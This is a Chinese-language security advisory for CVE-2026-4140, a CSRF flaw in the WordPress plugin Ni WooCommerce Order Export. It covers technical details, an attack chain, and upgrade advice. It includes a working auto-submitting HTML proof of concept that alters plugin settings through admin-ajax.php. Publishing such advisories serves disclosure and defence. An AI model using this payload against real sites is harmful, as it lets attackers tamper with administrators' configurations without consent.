IPBUF安全漏洞报告
English
CVE-2026-4140 CVSS 4.3 中危

CVE-2026-4140: Ni WooCommerce插件CSRF漏洞

披露日期: 2026-04-22

漏洞信息

漏洞编号
CVE-2026-4140
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Ni WooCommerce Order Export

相关标签

CSRFWordPressWooCommercePluginAuthorization Bypass

漏洞概述

WordPress插件Ni WooCommerce Order Export在3.1.6及以下版本中存在跨站请求伪造(CSRF)漏洞。该漏洞源于`ni_order_export_action()` AJAX处理函数缺少nonce验证,且在调用`update_option`更新设置时未验证用户权限。未经身份验证的攻击者可诱导管理员点击恶意链接,利用此漏洞修改插件配置,进而对网站完整性造成影响。

技术细节

该漏洞位于插件处理AJAX请求的逻辑中。具体而言,当`page`参数被设置为`nioe-order-settings`时,`ni_order_export_action()`函数会调用`Ni_Order_Setting::page_ajax()`。在该方法内部,代码直接使用了`update_option('ni_order_export_option', $_REQUEST)`来更新插件设置。关键问题在于,这一过程完全缺乏对WordPress Nonce(一次性令牌)的验证,同时也未对当前用户的权限(如`manage_options`能力)进行检查。攻击者可以构造一个特制的HTML页面,包含指向`/wp-admin/admin-ajax.php`的恶意请求。如果已登录的管理员访问了该页面,浏览器会自动携带管理员的Cookie发送请求。由于服务器端未验证请求来源,恶意请求将被执行,导致插件设置被篡改。

攻击链分析

STEP 1
侦察
攻击者识别出目标网站安装了存在漏洞的Ni WooCommerce Order Export插件(版本<=3.1.6)。
STEP 2
武器化
攻击者构造一个包含恶意HTML表单的网页,该表单旨在向目标网站的`/wp-admin/admin-ajax.php`发送POST请求以修改插件设置。
STEP 3
交付
攻击者通过社会工程学手段(如钓鱼邮件)诱导网站管理员点击链接或访问包含恶意代码的页面。
STEP 4
利用
管理员在已登录状态下访问恶意页面,浏览器自动执行表单提交,携带管理员会话Cookie发送伪造请求。
STEP 5
影响
目标服务器接收到请求,由于缺少Nonce验证和权限检查,服务器执行了设置更新操作,导致插件配置被恶意篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2026-4140 --> <!-- The victim must be logged in as an Administrator --> <html> <body> <form action="http://target-site/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="ni_order_export_action" /> <input type="hidden" name="page" value="nioe-order-settings" /> <!-- Malicious payload to update settings --> <input type="hidden" name="ni_order_export_option[setting_key]" value="malicious_value" /> <input type="submit" value="Click me" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

Ni WooCommerce Order Export <= 3.1.6

防御指南

临时缓解措施
建议管理员立即将Ni WooCommerce Order Export插件升级至修复了此漏洞的最新版本。在升级完成前,应严格限制管理后台的访问权限,并警惕不明来源的链接或邮件,防止遭受社会工程学攻击。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表